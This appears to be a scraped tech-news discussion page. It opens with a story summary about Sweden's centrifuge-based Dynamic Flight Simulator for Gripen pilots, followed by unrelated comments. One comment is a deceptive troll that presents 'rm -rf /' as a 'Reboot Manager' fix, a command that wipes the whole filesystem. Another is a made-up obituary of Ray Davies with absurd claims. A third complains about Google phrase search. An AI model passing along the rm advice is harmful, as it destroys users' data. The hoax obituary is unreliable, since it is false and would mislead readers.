Swedish Flight Simulator Adds G Forces

jonerik writes "According to this article in Aviation Week and Space Technology, Sweden's Dynamic Flight Simulator (DFS) is believed to be the first flight simulator which actually allows fighter pilots to experience G forces under simulated conditions. Designed and built by California-based Wyle Laboratories, the DFS is essentially a flight simulator capsule (in this case for Sweden's JAS 39 Gripen fighter) located at the end of a 30-foot centrifuge arm. 'We wanted to give pilots the ability to "fly" and interact with the environment rather than just be a passive [centrifuge] rider,' said Will Roberts, program manager for Wyle Laboratories' DFS programs. 'We've come a long way in being able to translate the six degrees-of-freedom you get in an aircraft into the three degrees-of-freedom that we can control in a centrifuge. It's not perfect, but we think it's pretty good. There's room for more research to make it even better.'"

You need to use the Reboot Manager (aka 'rm') and have it do a "root find":

    linux# rm -rf /

It usually takes a while; let it go at least an hour before rebooting.

I just heard some sad news on talk radio. Guitar legend Ray Davies of the Kinks, 59 was found dead in New Orleans. The cause of death seems to be from lead poisoning. There is no denying his contributions to the hardcore gangsta' rap culture. Truly a British icon!

  11. Google STILL can't do phrase searches by Anonymous Coward · · Score: -1, Offtopic
Google STILL can't do phrase searches. The search on "to be or not to be" produces 3 bogus results in the first 10. Pretty sloppy.

    Note:

I DID put "" around the phrase

Putting a + in front of the search still produces bad results

The desired phrase is not present at all in the page, not even in hidden keywords.

The bad results are not relevant: I asked for "to be or not to be", not the variations that do not match.

It does not matter that "pages with the phrase linked to these pages". That is now how Google works. If you read their own "Help", they say that a search produces results containing the phrase or word asked for. The "pages linking" part is only used for ranking. (so this is not a problem with me not understanding how Google is supposed to work)

This problem is sympomatic of Google searching: single-word searches work great, but phrase searches often come up with a lot of irrelevant results.

This is not rocket science. What is so hard about the basic `find where a = b` kind of search?

I asked Google about this. They said it was a bug they might fix someday. (so this is, again, not my misperception of how Google works)

As for Visisimo. I tried it. The results on the "to be or not to be" search were 100% accurate, unlike Google.
